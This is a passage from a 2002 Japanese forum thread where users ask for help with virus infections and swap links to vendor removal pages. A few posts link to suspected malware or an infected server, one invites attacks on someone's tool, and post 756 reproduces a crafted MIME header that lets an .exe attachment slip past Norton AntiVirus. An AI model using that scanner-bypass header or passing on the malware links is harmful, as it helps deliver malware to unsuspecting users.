634 :名無しさん@お腹いっぱい。:02/03/09 22:23

>>628
だっただよ

635 :628:02/03/09 23:33
>634
一応シマンテックのオンラインスキャンもやったけど検出されず。
こっちはトレンドマイクロに分析頼んでみるよ。

636 :名無しさん@お腹いっぱい。:02/03/10 00:16
うちでもアンチドートで"Win32.ZMist"が検出された。
JUST SSYSTEMのフォルダにあった。
初めてのウイルス検出で焦って削除しちゃったよ・・・


637 :(゚ρ゚)アウアー :02/03/10 01:02
実際流行ってるのか、、誤検出なのか、、、
かなーり高度なポリモ積んでるみたいだからにょ。。
AVPとNAIだけか?一応対応してるの。
ドート君は優秀だの。


638 :名無しさん@お腹いっぱい。:02/03/10 01:42
193 :名無しさん@お腹いっぱい。 :02/02/06 20:17
http://www.geocities.com/kendokobayashi1111/a.html
ここに置いてるa.exeってファイル
アングラサイトで拾ったんだけど、
かなりウイルスっぽいです。
でもウイルスバスタで検出できません。

だれか実行してみて
or
他のアンチウイルスソフトで試してみて

これなんですか?

639 :XYZ:02/03/10 01:55
http://www.geocities.co.jp/MusicStar-Keyboard/7230/
自作のセキュリティソフト試すんで
ハッキングかけてくれれば幸いなり
ヘボどもかかってきやがれ!!!

640 :チューボー:02/03/10 02:01
ウィルスに興味津々なチューボーです!
誰か送ってきてくれないかな?
けっこうHDとかボロボロにするくらい強いやつが希望

641 :名無しさん@お腹いっぱい。:02/03/10 02:03
>>640
winmxをやれ。

642 : :02/03/10 02:07
>>640
メールアドレス書き込むだけでウイルスが送られてくるはずだが。
Sircam Hybris など

643 :名無しさん@お腹いっぱい。:02/03/10 02:15
>>640
おまえのメアドじゃないだろ

644 :名無しさん@お腹いっぱい。:02/03/10 08:36
皆さん、こんにちは。
山長って代官山にあるって聞いたんですが、具体的にどこらへんにあるのでしょうか?


645 :名無しさん@お腹いっぱい。:02/03/10 09:55
WORM_GIBE.Aがきた
ヘッダみないで実行するバカがひっかかりそうな内容だった

646 :cheshire-cat:02/03/10 11:58
>>627
6日にinstall.exeをダブルクリックすると、winkqlu.exeなんて名前のができた。
起動時にしっかりと動いている。
ところがいつまで待っても、ファイル上書きしてくれない。

さっきまたやってみた。
Win2k パッチ全く無し、FAT32だったんだけど。日付を5日23時50分くらいにして。
6日になっても、何回再起動しても、ファイルをあぼーんしてくれなかった。

だから何ともいえないんだけど、メモ帳で破損jpgファイル開いて、どういう状態なのか確かめてみてはどうだろう。

647 :cheshire-cat:02/03/10 12:03
上書きハカーイが見たい(鬱

648 :別スレ351 ◆enghYAOw :02/03/10 12:56
確かめてみました…
…変な文字が出てくるだけでな〜んにも分かりません。

どうなってれば大丈夫で、どうなってれば大丈夫じゃないんですか?

649 :名無しさん@お腹いっぱい。:02/03/10 19:01
Hybrisが毎日同じ時間にmail.kenpell-tech.net を経由して
やってくるんだけど他でもそおなん?
昨日からこなくなったけど。
中継鯖つぶれたかな?


650 :cheshire-cat:02/03/10 19:15
>>648
ハカーイ後のjpgファイルと、他から拾ってきたハカーイ前のjpgファイルを比べるとか。
同一なのに開けないなら、他の要因を考えましょうか。
違うなら、ハカーイかと。

Symantecにて、0で埋め尽くすとか書いてたけど、再現できずに実物見れてない。
どう?同じ文字ばっかりがずらーっと並んでる?

なんだか息の長いやり取りですね、互いに。

651 :別スレ351 ◆enghYAOw :02/03/10 19:53
見てみると0ばかりでもありません。
でもハカーイ後のファイルには必ず「run is Dos mode」の文字が…
やっぱハカーイされてるんでしょうか…

>なんだか息の長いやり取りですね、互いに。

じゃぁ、これからメールでやりとりさせてもらってもいいですか?

652 :cheshire-cat:02/03/10 20:12
>>651
あまりメルは頻繁にはチェックしないから、遅レスになると思うけど。

気になって洋モノjpgを幾つかチェックしたけど、run is dos modeって文字は無いし。
やっぱりハカーイされている可能性が大だと思う。

元々全く同じ画像ならば、それぞれ比較すればいいかと思って。
開けなくなったjpgと、それと同じもので開けるjpgってあるでしょ。
例えば壁紙とか、どっかのサイトからすぐ拾える(容易にもう一度入手できる)jpgとか。

それらに、「開ける123.jpg」「開けない123.jpg」って、名前をつけて、送ってみそ。

653 :名無しさん@お腹いっぱい。:02/03/10 20:21
アンチドート簡易版を実行したところ、
二つ見つかったんだけど。(どっちも、Win32.ZMist)
\Program Files\Common Files\ASG Shared\ADDRDIC\PMLTDB32.DLL = ウイルス感染 : Win32.ZMist
\WINDOWS\TEMP\s3vv18ph.DLL = ウイルス感染 : Win32.ZMist

上にも書いてあったけど、これって…。
とりあえず隔離したところ、ゾーンアラームがなんか変な具合になりました。
(起動すると英文で”TrueVectorを探しています、キャンセルしますか?”みたいなことを聞いてきてキャンセルボタンを押してもおさなくても、ZAのアイコンがXマークになる。)
で、ネットにつながらないので、s3vv18ph.DLL だけ元に戻して今書き込んでます。
とりあえず、どのように対処したらいいっすか?
(このウイルス?の情報って、英語の奴を読んだだけなんだけど、あまり情報ないっすね)


654 :名無しさん@お腹いっぱい。:02/03/10 20:33
「困ったら上書き」って慣例があるだろう。

ヲイヲイ、感染したファイルを戻すなよ。普通、Zoneを殺すだろ。

655 :cheshire-cat:02/03/10 20:42
>>653
今回はMcAFEEの方が詳しかった。もう見たならスマソ。
http://vil.mcafee.com/dispVirus.asp?virus_k=99382

656 :653:02/03/10 20:49
>>655
レスどうも。それ、昨日読んだんですが…
とりあえず、どうすればいいんでしょう??
マカフィでは削除できるみたい?
ノートン先生では、「検疫」すら出来ませんでした。
アンチドートは削除できない簡易版なので。



657 :cheshire-cat:02/03/10 22:01
>>653
それと同じファイルがあるなら、メルで送ろうとしたんだけど、無かった。
何のアプリで使っているファイルなのかわかるなら、654の人のレスに従って、それと同じファイルをもらってきて上書きとか。

>ノートン先生では、「検疫」すら出来ませんでした。
ポリモかかっているから、検出しずらいのかもなー。
それが「ガイシュツ」、の古いバージョンとは限らないし。

製品版買えばいいのに。
でもやっぱり漏れなら、しつこそうなVilliだからOSクリーンインストールする。

658 :名無しさん@お腹いっぱい。:02/03/10 22:09
教えて下さい。
Norton Anti Virus2001によると、アプリの一部がBackdoor.Trojanに感染
しました。修復不可で検閲に隔離されています。
ウイルスが特定されていても、修復できないもんなのでしょうか。又、当方
Meですがシステム復元のチェックを一旦外した方がいいのでしょうか。



659 :名無しさん@お腹いっぱい。:02/03/10 22:14
Antidote Personalでの誤検出疑惑 W32/Zmistだが
今日データ更新したら、やたらと長くかかり、その後
W32/Zmist検出せず。
やっぱり誤検出だったみたい。
近々、簡易版も更新されると思う。

660 :cheshire-cat:02/03/10 22:18
>>658
>システム全体のスキャンを実行し、Backdoor.Trojan として検出されたファイルをすべて削除

こんなの書いてるけど。削除すればいいのに。ウイルスそのもののファイルを修復できる訳もなく。
http://www.symantec.com/region/jp/sarcj/data/b/backdoor.trojan.html

661 :653:02/03/10 22:20
チェシャ猫さん、レスどうもありがとうございます。
>659
誤検出ってことは、このまま何もしなくてもオッケーってことですよね?
なんかホッとしたと同時に、
ウイルスに対する警戒心が増す今日この頃…。



662 :cheshire-cat:02/03/10 22:29
>>659
誤検出かぁ。

663 : :02/03/11 01:01
教えてください。
ハードディスクの空き容量が食われるんです。
最初は、500MBの空き容量。これがほとんど0まで
食われる。で、電源切ってしばらくすると、
もとの空き容量(500MB)に戻るんです。
これはいったいなんでしょうか。Norton
つかってスキャンしてもなにも反応なし。
ですが、ハードディスクの容量が食われる。

664 :名無しさん@お腹いっぱい。:02/03/11 12:11
>>663
せめて OS 名くらい教えてくれ・・・
アドバイスが出来ないヨ

665 :名無しさん@お腹いっぱい。:02/03/11 14:28
パソコンがウィルスに感染したかもしれないので
トレンドマイクロのオンラインウィルススキャンを使おうとしたのですが
更新ファイルダウンロード中にエラー7が出てダウンロードできず
ウィルススキャンできませんでした。
何故だかわかる方、教えてくれませんでしょうか?

666 :名無しさん@お腹いっぱい。:02/03/11 14:40
>665
エラー7って何?
もっと詳しく書いて。

667 : :02/03/11 14:46
>>665
エラーさぐってる暇があったら製品版を買いに走れ

668 :665:02/03/11 15:09
>>666
「サーバーが使用中か、ネットワークトラフィックが原因だと思われます。」
と言うメッセージ、
エラーコード:7
エラーストリング:アップデートできませんでした
と言われます。
再試行しようとしたら途中で終わってしまい、ウィルス検索できません。

669 :名無しさん@お腹いっぱい。:02/03/11 18:52
>>663
Me?

670 :名無しさん@お腹いっぱい。:02/03/11 21:09
>>663
そういう事はWin板で聞け。んでもってウィルスかも? といわれてから来い。


671 :名無しさん@お腹いっぱい。:02/03/12 21:57
100以上のメールが添付されたメール送られたんだけど、
大丈夫ですか?送った本人は送信した覚えがないっていうんだけど。
一応ウイルスバスターではひっかからなかったんだわ。
親切な人教えてください。



672 :名無しさん@お腹いっぱい。:02/03/12 22:04
>>668
もしかしたらWindowsをC:以外にインスコしとるだろ。
それを解決するにはレジストリをいじるしかない。
俺はそれでうまくいった。


673 :名無しさん@お腹いっぱい。:02/03/12 22:10
>>671
>100以上のメールが添付されたメール

???意味不明。
もっと詳しく書いて。

674 :cheshire-cat:02/03/12 22:16
>>671
それ、欲しい。是非。

675 :名無しさん@お腹いっぱい。:02/03/12 22:17
>>671
常識で考えて大丈夫なわけないだろ(送った本人も心当たりがないんだし)

676 :cheshire-cat:02/03/12 22:23
新種!

677 :671:02/03/12 22:26
だから書いたままの状況なんだが。。。
あと
本人のメアドが件名に表示されていた。
送信先アドレスは添付ファイルのアドレスと同じらしい。

心当たりのあるウイルス名を教えてください。
こっちのPCは最新パターンで検索しましたところ問題なさそうです。


678 :671:02/03/12 22:27
新種ですかね?

679 :名無しさん@お腹いっぱい。:02/03/12 22:29
>>677
書いたままなのは分かるが、そっちが何を書こうとしてるのか分からんのだ。

メールにメールが 100 通添付されてたと思っていいのか?

680 :名無しさん@お腹いっぱい。:02/03/12 22:30
<IT>CからZドライブを全て上書きするFinal Fantasyワーム
http://news.2ch.net/test/read.cgi/newsplus/1015938003/l50

681 :671:02/03/12 22:34
>>679
そうです。メールに添付ファイルとしてメールが100以上添付されてました。
そのメールはメモ帳で開いてみると、どうも相手のPCに保存されている
メールのようです(ヘッダー見る限り)日本語本文は文字化けでみれません。

凶悪なブラクラに引っかかったのかなとも思いますが。

682 :名無しさん@お腹いっぱい。:02/03/12 22:36
(´ー`)

683 :cheshire-cat:02/03/12 22:40
>>681
添付のメルファイル以外には、添付ファイルは無かった?
ということは、HTMLメール?

684 :名無しさん@お腹いっぱい。:02/03/12 22:46
PC初心者であまりよくわからないのですが、どうやらPE_Mtx.A, WORM_MTX.A という
ウィルスにメールから感染してしまったみたいです。
「Entry-point-obscuring」を使用した32bit形式実行可能ファイル(PE形式)感染型ウイルス
というらしく、(ネットでやっと調べられました・・。)
やはり市販の駆除ソフトなどを買わなければならないのでしょうか。
どなたかウィルス駆除に詳しい方、宜しくお願い致します。





685 :671:02/03/12 22:49
>>683
はいメールファイルだけです。nextpartで区切られた。
ひとつひとつの添付メールは
------=_NextPart_*********************(*はランダム数列)
で区切られている。

また、タグらしきものは入ってませんでした。


686 :cheshire-cat:02/03/12 22:50
WEBで検索したのに、なぜ無償駆除ツールが見つけられないのか理解に苦しむ。
http://www.symantec.com/region/jp/sarcj/data/w95.mtx.fix.html

けどね、いくつかのファイルはもう破損していて修復不能だよ。
駆除成功しても、これから先、頻繁に画面が固まったり動作不良になるかと。
OSクリーンインストールをお勧めします。

687 :名無しさん@お腹いっぱい。:02/03/12 22:52
>>684
サポートが必要なら店で買ってきたほうが自分も幸せ。周りも幸せ。

688 :cheshire-cat:02/03/12 22:53
>>685
謎だね。まさかメーラーが壊れていたってオチなんだろうか。
新種!って喜んでいたのに。悲しい。

感染活動を行わない、ワームっぽくないVilliって、存在意義無さそうだし。

689 :671:02/03/12 22:56
>>688
まだ感染してないともいえませんよね?新種なら。

690 :671:02/03/12 22:57
今度からsageで書きます。すみません。

691 :名無しさん@お腹いっぱい。:02/03/12 23:02
>>689
いや、送られてきた(添付でないほうの)メールの内容が
HTMLでなくて、且つ、添付されてきたファイルのヘッダーとかに
異常がなければ、メールが感染経路でない事は分かる。

ちなみにどちらから送られてきた?

692 :cheshire-cat:02/03/12 23:03
>>689
数日後にシマンテックあたりで掲載されていたら、やだね〜

漏れの経験則なんだけど。
添付ファイルが怪しくなくて、メール本文に変なコードが無ければウイルスじゃない。
でも本文じゃなくて、添付のメルファイルに挿入されていたら、やだね。

とりあえず、「もし本当にウイルスだったら」、という前提で。
受信ボックスのメールを全てエクスポートして、それから受信ボックスのメールを全て削除。
アドレス帳をエクスポートして、登録されているアドレスを削除(もしウイルスがこれから情報を得ているなら、知人に被害を及ぼすから)。
これって「過剰な反応というかやりすぎ」、かもしれないけど。

でも本文、怪しくなかったんしょ?ならいいような気もする(実物見てないから自信ないけど)。

693 :671:02/03/12 23:12
>>691
PCには詳しくない知り合いからです。
アウトルックも古いバージョンでした。

X-Mailer: Microsoft Outlook Express 5.00.2314.1300
X-MimeOLE: Produced By Microsoft MimeOLE V5.00.2314.1300


私のメアドがアドレス帳にあったからだとおもいます。
で、アドレス帳にあるすべてに送信したと思いますが、
そいつのアドレス帳が見れないので送信先と一致するか否かは不明です。

>>692
ありがとうございます。
ご教示いただいた対策一応やっておきます。


694 :cheshire-cat:02/03/12 23:25
>>693
漏れが書いた対策って、「やりすぎじゃないかな〜」って思うけど。

でもアドレス帳、便利だけど使わないほうがいいよ。
これを標的にしたのが多いから。

695 :名無しさん@お腹いっぱい。:02/03/13 00:07
>>692
そこまでやるなら、OE捨てたほうがいい。

696 :名無しさん@お腹いっぱい。:02/03/13 00:08

a vexのプロテクトCDを入れると
自動的にレジストリが書き変わる等して
不具合も起こる可能性がるそうです

697 :名無しさん@お腹いっぱい。:02/03/13 00:16
英語なんてめったに使わない勤務先のアドレスに、今朝から
サブジェクトが英語なり文字化けなりのメールがいくつか来ました。
定義ファイル最新のバスターもノートンも通過。
保存して中を覗いてみると、添付ファイルの拡張子がそれぞれ
bat,xls,doc、でReturn-Pathがロシア宛。
なんだかやけに怪しくないでしょうか?

698 :cheshire-cat:02/03/13 00:17
>>695
アドレス帳使わず、パッチ当てればいいメーラーだと思うけど。
HTMLメールよく使うんで。

確かに各種villiの攻撃対象だわな。

699 :cheshire-cat:02/03/13 00:18
>>697
xlsやdocはともかく。
batはさ、ちょっとした小物を仕込んでも検出されなかったりするよ。

700 :名無しさん@お腹いっぱい。:02/03/13 00:30
件名が「鈴木宗男議員に関する緊急世論調査」で本文なし。
「3c8e1aaf.html」が添付されたメールが来たのですが、これが
今の流行ですか?

701 :697:02/03/13 00:31
>>699
どんな小物がどう動きそうなのか、見当もつきませんが
(自分でバッチファイル書いたこともないものですから)
検出されなくても用心することにしますね。
どうもありがとうございます。

702 :名無しさん@お腹いっぱい。:02/03/13 00:32
>>698
攻撃されるだけならいいけど、簡単に加害者になれるのはちょっとね。

703 :名無しさん@お腹いっぱい。:02/03/13 00:32
>>700
なるほどつい開きたくなるな

704 :通行人:02/03/13 00:34
ここに行くとNimdaワームに感染していると言う警告が出るので要注意
http://210.212.212.130/


705 : :02/03/13 00:45
>>704
クリックしても大丈夫ですか?つーか、したいんですけど。

706 :名無しさん@お腹いっぱい。:02/03/13 00:52
>>705
そういう時はココで聞け。
http://ex.2ch.net/test/read.cgi/entrance/1015927791/l50
鑑定依頼は age 且つコメントつきで。

707 :通行人:02/03/13 00:54
>705
逝く時はウイルススキャンで見張りを忘れずに。


708 :663:02/03/13 01:11
>>664>>669>>670
すいません。最近忙しくて返事遅れました。
OSはWin98です。起動して3時間後ぐらいから、
ハードディスクが埋まりはじめます。

でも、まずWin板で聞いてみます。ありがとうございます。

709 :名無しさん@お腹いっぱい。:02/03/13 16:24
ここ数日、1日に数通

Subject: Internet Security Update
From: "Microsoft Corporation Security Center" <rdquest12@microsoft.com>
To: "Microsoft Customer" <'customer@yourdomain.com'>

というメールが届いてます。 q216309.exe という添付ファイルが付いてます。

で、見知らぬメールサーバーから

A message from Willard_Ireland@mazer.com with the subject
Internet Security Update was not delivered to you because
it was suspected of containing a virus.

というメールが届きました。
メールは UNIX で読んでるので実害は無いのですが、
こういうのって、どっかに通報すべきですか?

710 :名無しさん@お腹いっぱい。:02/03/13 16:29
>>709
http://www.ipa.go.jp/security/format/report-format.html

711 :似ている・・・。:02/03/13 16:44
http://www.symantec.com/region/jp/sarcj/data/w/w32.gibe%40mm.html



712 :名無しさん@お腹いっぱい。:02/03/13 16:57
>>710
ありがとうございます。

>>711
まさにそれみたいですね。

713 :名無しさん@お腹いっぱい。:02/03/13 19:22
すみません。質問です。

つい出来心でウイルスを実行してしまいました。
オンラインスキャンによると“W95.Hybris.gen”のようです。
Windowsが使用しているWsock.DLLを書き換えてしまい、削除できなくて困っています。

どうすれば良いでしょうか?

714 :もうだめぽ!:02/03/13 19:35
>>713
あきらめて、フォーマットしなさい

715 :名無しさん@お腹いっぱい。:02/03/13 19:40
>714
マジすか!

もう少し待ってみて、やはり有効な対策がないと諦めが付けばフォーマットします。
誰か良い案ないですか?

716 :名無しさん@お腹いっぱい。:02/03/13 19:49
>>715
Windowsが使用しているファイルの削除方法が分からんと言われちゃ
方法を提示してもまともな駆除は望めない

だからフォーマットしてもらうのが最善策なんだが

717 :名無しさん@お腹いっぱい。:02/03/13 19:54
あ、削除できるんですか?

と、とりあえず方法だけでも示して頂けませんでしょうか?

718 :名無しさん@お腹いっぱい。:02/03/13 20:08
http://www.symantec.com/region/jp/sarcj/vinfodb.html

719 :名無しさん@お腹いっぱい。:02/03/13 20:13
シマンテックの解説は読みました。
でも、結局「ノートン使え」としか書いてませんでした。

やはりフォーマットしかないのでしょうか・・・

720 :cheshire-cat:02/03/13 20:25
>>719
で、どのバージョン?そのHybris。
アンチウイルスソフトの名前を書いてくれないと、変種が多い奴はレス付けづらい。
自分がレスしたのと違うバージョンだったら嫌だし。
だってアンチウイルスソフトごとに検出名が異なるって、よくあること。

どんぞ。参考までに。
http://www.trendmicro.co.jp/vinfo/virusencyclo/default5.asp?VName=WORM_HYBRIS.A

721 :名無しさん@お腹いっぱい。:02/03/13 20:34
アンチウイルスソフトは持ってないです・・・根本から間違ってますか(;;

トレンドマイクロの自動修復ツール、どうもありがとうございます!
これでどうにかなりそうです。

まずは細かいバージョンを調べてきます。
重ね重ねありがとうございました。

722 :名無しさん@お腹いっぱい。:02/03/13 21:19
土曜日からメールを出したことのない人から
「お宅からウイルスが届きました」というメールが来ました。
私は出した覚えがないので出していませんがという
メールを送ったのですが、その方も私に送った覚えがないと・・・
その人の所には1時間の間に3000通のメールが届いたそうです。

今日は別の人からお宅から苦情メールが届くんだけどというメールを貰ったのですが、
出した覚えが全くない人からです。

ノートンを常駐させていて、Trend Microのオンラインスキャンもかけましたが
ウイルスに感染はしていませんでした。

上に書いたメールには添付も何もありません。
これって誰かがウイルスにかかっていて、それが勝手に届くと言うことなのでしょうか?
全く見知らぬ人からなので気持ちが悪くて・・・
どなたか何か知っていれば教えて下さい。お願いします。

723 :cheshire-cat:02/03/13 21:25
>>722
感染しているのは相手の方という説も。またウイルスが送信者をごまかしているとか。

また誰かが君を装って意図的にメル送ってる可能性もあるかと。
相手に連絡して、送信者のメールヘッダから、IPアドレスを見てみ。

724 :名無しさん@お腹いっぱい。:02/03/13 21:27
>>713
削除したいファイルの名前は分かってるの?

DOS の起動ディスク作って DOS で起動してから del コマンドで削除とか。

725 :722:02/03/13 21:29
>cheshire-catさん

ありがとうございます。
一人の方のメルアドは、プロバにこの方ウイルスにかかっているかも
しれませんよと報告したんです。
他のメールはは大学でした・・・

私は大丈夫だと安心しても良いんでしょうか?
一度IPアドレスを調べてみます。

726 :名無しさん@お腹いっぱい。:02/03/13 21:34
>>725
送信元アドレス、IPアドレス、中継MTA、メーラー、そのバージョン
そのあたりを正規のものと比較すれば良いんじゃないかな?

727 :713:02/03/13 21:36
>724
なるほど。
Windowsで保護されてるファイルも、DOSで起動すれば
delコマンドで削除できるわけですね。
役に立ちそうなので覚えておきます。

問題自体は解決できました。


728 :cheshire-cat:02/03/13 21:39
>>725
>私は大丈夫だと安心しても良いんでしょうか?

うんにゃ。
君のパソコンが、未知Villi感染中って可能性もある。
メーラー使わずにsmtp機能内蔵で自力でメル出すウイルスなら、メーラーにログは残らなかったりするだろうし。

もっとも単純な手だけど、そのパソコンを使わないで放置とか。
そしてその間に相手にメールが届いたんなら、君じゃない、確実に。

まずは相手に時刻と送信元のIPアドレスの問い合わせを。
それから次の手を考えましょうか。

729 :名無しさん@お腹いっぱい。:02/03/13 21:43
>>727
いや、システムファイルに取り付くとdelだけを覚えても対処できない
attribとかextractとかも覚えておく必要がある

修復できたか、よかったな

730 :713:02/03/13 21:46
>729
良い機会なのでDOSコマンドを勉強してみます。


731 :722:02/03/13 21:47
>cheshire-catさん

何度もありがとうございます。
一人の方に問い合わせてみました。
すぐに返事をくれたのですが私のメルアドからは届いていないらしいのです。
その方がウイルスを送ってきた相手にメールを出しただけで他の人には
一切送っていないとのこと・・・
私に送られてきたメールと同じ内容のものをその人に送ったらしいのです。
意味が判りにくいかもしれませんが、一人の人に送ったメールが何人もの人に
ばらまかれていると言うことなのでしょうか?


732 :cheshire-cat:02/03/13 21:59
>>731
そのウイルスの名前が知りたいんだけど。

それともメーラーの設定使ったんだろうか、あ、独り言です。

733 :名無しさん@お腹いっぱい。:02/03/13 22:05
>>729
そういえばそうだな。
フォローありがと。

734 :722:02/03/13 22:07
>cheshire-catさん

「W32.Alcarys.D@mm」これらしいです。
二つのメルアドから送られてきたらしいです。
そしてその人にメールを出したらしいのですが、
そのメールが私の所にも届いたと言うことなんです。
何か文字で説明していると訳がわからなくなってきました。
ごめんなさい。

735 :名無しさん@お腹いっぱい。:02/03/13 22:09
>>730
まだ見てたらだけど。
それ以前に、DOSの起動ディスクの作り方は知ってる?
知らないんならついでに聞いて。

736 :722:02/03/13 22:09
すいませんsageなければならなかったんですね。

737 :cheshire-cat:02/03/13 22:42
>>734
アルカリスDは、情報がほとんどまだ出ていない。
実物がないので、ちょっとギブ。お力になれずスマソ。

まずはこれを(もう見たかな?)。
とりあえずアンチウイルスソフトもそうだけど、一応念のためファイル名で検索して感染チェックを。
http://www.symantec.com/region/jp/sarcj/data/w/w32.alcarys.d%40mm.html

最初、表示される送信元アドレスを偽装するのは簡単だから、君を装ってメール出したのかと思ったんだけど。

送信者の項目、数日後にはSymantecあたりで詳細情報出るかも。うーん。

738 :722:02/03/13 23:03
>cheshire-catさん

本当にありがとうございます。
私Outlookも使っていないし、ノートンを8日にちゃんとウイルス定義も
最新版にしているんです。
と言う事は私は何ともないと喜んでも良いと言うことですよね。
色々聞いてくれてありがとうございました。

739 :名無しさん@お腹いっぱい。:02/03/13 23:37
http://www.msknet.ne.jp

740 :名無しさん@お腹いっぱい。:02/03/13 23:44
最近文字を入力して変換するとIMEJP,KNL,DLLエラーとなって
シャットダウンしてしまうのですが、
これってウイルスに感染しちゃったんですか?

741 :名無しさん@お腹いっぱい。:02/03/13 23:49
自分のPCがウィルスに感染したかどうかわからないすべての質問者へ。

ここで質問するより前にアンチウィルスソフトを買ってきなさい。
それが済んだ上でまだ不安ならここで質問しなさい。

742 :名無しさん@お腹いっぱい。:02/03/13 23:49
>>740
ウィルス検索はしましたか?話はそれからですが。

743 :名無しさん@お腹いっぱい。:02/03/13 23:51
>>740
ここを見てこい。
http://www.google.com/search?hl=ja&q=IMEJPKNL%2CDLL%83G%83%89%81%5B&lr=

744 :ナマでパコパコ!!!!:02/03/14 00:03
ナマでパコパコ!!!!
インターネット=ソープランドのマンコ
パソコン=チンコ

これでもナマでヤリますか?

淋、蔵まみれになりますか?


745 :名無しさん@お腹いっぱい。:02/03/14 00:04
740です
ノートンには引っ掛かりませんでした

746 :sasa:02/03/14 11:51
件名が「R:重要」とか「R:資料」でpatch.EXEとゆう添付ファイルの付いたウイルスなんですが、
どなたか詳しくご存知のかたはいませんか?

747 :ニムダちゃん :02/03/14 11:55
>>746
呼んだ?

748 :dj:02/03/14 13:39
>>746
patch.exe はうちにも来てます。ファイルサイズは 43,836 bytes
ですが、何なのかよく分からない。

メモ帳で開けてみると、Content-Transfer-Encoding: BASE64 と
書いてあるので、それ自身でメールを発信するのかもしれない。

749 :748:02/03/14 13:46
くだ質のここに載ってたべさ・・・逝ってきます
http://pc.2ch.net/test/read.cgi/sec/1014116411/531-

http://www.trendmicro.co.jp/vinfo/virusencyclo/default5.asp?VName=WORM_FIDAO.A

750 :名無しさん@お腹いっぱい。:02/03/14 13:59
>>746 それはこれですね
ttp://www.trendmicro.co.jp/vinfo/virusencyclo/default5.asp?VName=WORM_FIDAO.A
今日現在、トレンドマイクロ以外未対応のようだす。

751 :名無しさん@お腹いっぱい。:02/03/14 14:10
これとファイルサイズいっしょだね。
http://www.symantec.com/region/jp/sarcj/data/w/w32.qint@mm.html

752 :名無しさん@お腹いっぱい。:02/03/14 14:28
トレンドマイクロってパターンファイル240出た?

753 :名無しさん@お腹いっぱい。:02/03/14 17:47
出たらしい?けど今は既に241

754 :Norton AntiVirusに、複数の脆弱性が発見された。:02/03/14 19:50
一つ目は、.dbxまたは.nchに変更されたファイルが 検知できない問題。
二つ目は、NullキャラクターがMIMEタイプに含まれている場合、ウイルスが検知が出来ないという問題。
三つ目は、RFCに準拠していないMIMEフォーマットの中に悪意のあるコードが含まれている場合、
ウイルスの検知動作がストップしてしまう問題。
これらにより、MIMEヘッダーのContent-Typeで、applicationとattachmentを操作されたファイルが
検知されないため、Wordなどのマクロウイルスが検知されずに実行されてしまう。ウイルスメールが検知されず、
トロイの木馬が仕込まれる。スキャン動作が停止されるため、ウイルスメールを受信してしまうなどの問題が発生する。

755 :Norton AntiVirusに、複数の脆弱性が発見された。 :02/03/14 19:51
SecurityFocus
Symantec Norton AntiVirus Conflicting MIME Header Vulnerability
http://online.securityfocus.com/bid/4246

SecurityFocus
Symantec Norton AntiVirus Excluded Filetype Email Protection
Bypass Vulnerability
http://online.securityfocus.com/bid/4245

SecurityFocus
Symantec Norton AntiVirus NULL Characters Incoming Email
Protection Bypass Vulnerability
http://online.securityfocus.com/bid/4242

SecurityFocus
Symantec Norton AntiVirus Non-RFC Compliant Email Protection
Bypass Vulnerability
http://online.securityfocus.com/bid/4243

SecuriTeam.com 2002/03/14 追加
Various Vulnerabilities in Norton Anti-Virus 2002
http://www.securiteam.com/windowsntfocus/5PP0B0U6KU.html

756 :Norton AntiVirusに、複数の脆弱性が発見された。:02/03/14 19:53
http://homepage2.nifty.com/spw/secure/index.html
http://www.securiteam.com/windowsntfocus/5PP0B0U6KU.html

Content-Type: application/msword;
name=\"Virus.nch\"
Content-Transfer-Encoding: base64
Content-Disposition: attachment;
filename=\"Virus.exe\"


757 :名無しさん@お腹いっぱい。:02/03/14 20:47
HIKARU.A に感染したみたいなのですが初心者でもわかりやすく駆除の仕方を教えてください

758 :名無しさん@お腹いっぱい。:02/03/14 21:33
>>757
初心者ちゃんはPC初心者板へ
コンピュータウィルス総合スレッド VOL.15
http://pc.2ch.net/test/read.cgi/pcqa/1015798305/

759 :うんこ:02/03/14 21:40
WORM_JAPANIZE.A

このワームは WORM_FBOUND.B に名称が変更されました。

http://www.trendmicro.co.jp/vinfo/virusencyclo/default5.asp?VName=WORM_JAPANIZE.A



W32.Impo.Gen@mm

2002年3月14日、W32.FBound@mmからW32.Dotjaypee@mmへ、そしてW32.Impo.Gen@mmに
ウイルス名を変更しました。

テクニカルノート:


メールアドレスの最後が .jpの場合、件名は以下の17種類のうちの中からランダムに送信されます。

件名:

重要
Re:重要
重要なお知らせ
Re:重要なお知らせ
例の件
Re:例の件
お久しぶりです
Re:お久しぶりです
こんにちは
Re:こんにちは
極秘
Re:極秘
資料
Re:資料

ウャR
うんこ

http://www.symantec.com/region/jp/sarcj/data/w/w32.impo.gen@mm.html

http://www.nai.com/japan/virusinfo/fbound.asp



760 :名無しさん@お腹いっぱい。:02/03/14 23:29
>>759
ウチの会社でも引っかかってたのいたなぁ。
前者に迅速に警告メール出してたのは誉めたるけど、しかし、

俺に言わせれば、添付の EXE ファイルダブルクリックする奴が気が狂ってる。

761 :名無しさん@お腹いっぱい。:02/03/14 23:30
ちょっとお聞きしたいのですが、先ほど、何かいかにも怪しそうな題名の
添付ファイルの付いていないメールが届きまして、開けようか止めようか迷っています。
題名は「Thank you」で、送り主のメアドのドメイン名?は @yahoo.com です。
もしかしたら知人からのメールかもしれないので削除して良いものかどうか・・・・・・

メールに添付ファイルが付いていない場合でも、ウイルスに感染する可能性は有るのでしょうか?
どなたかご存じの方がいらっしゃいましたら、お答えくださると幸いです。

762 :cheshire-cat:02/03/14 23:39
>>761
>メールに添付ファイルが付いていない場合でも
あるよん。Bubble Boy(日本語環境では動かない)とか。またhtmlメルに埋め込みとか。


763 :名無しさん@お腹いっぱい。:02/03/14 23:39
>>761
使っているメーラーを教えてください。話はそれからです。

一言で言うと、Outlook Express と Outlook の場合は、設定によっては
問答無用でウィルスに感染します。

764 :cheshire-cat:02/03/14 23:43
>>763
OEやOutlookのセキュリティを制限サイトにしていない人が多いのは、空しいよね。

765 :名無しさん@お腹いっぱい。:02/03/14 23:44
添付名が「ppodolpp」となっているのはなんでしょうか?

766 :名無しさん@お腹いっぱい。:02/03/14 23:46
>>764
おっしゃる通りです。
まぁ、XML のセキュリティホールみたいなのもあるんで、何をどうしようが
やられる時やられるというのが現状ですが。

・・・今思いつきましたが、もしかして、XML の穴、OE でもやられる?

767 :cheshire-cat:02/03/14 23:48
>>765
多分Hybris.B
英語のアルファベット8文字で、最初の2文字と最後の2文字が同じだから。

768 :名無しさん@お腹いっぱい。:02/03/14 23:52
ソフトがインストールできないのですが、
ウイルスの可能性はありますか?ちなみに
デジカメとインターネットセキュリティを
こころみましたところ『不正操作を行なったため
終了します』みたいなことが表示されます。

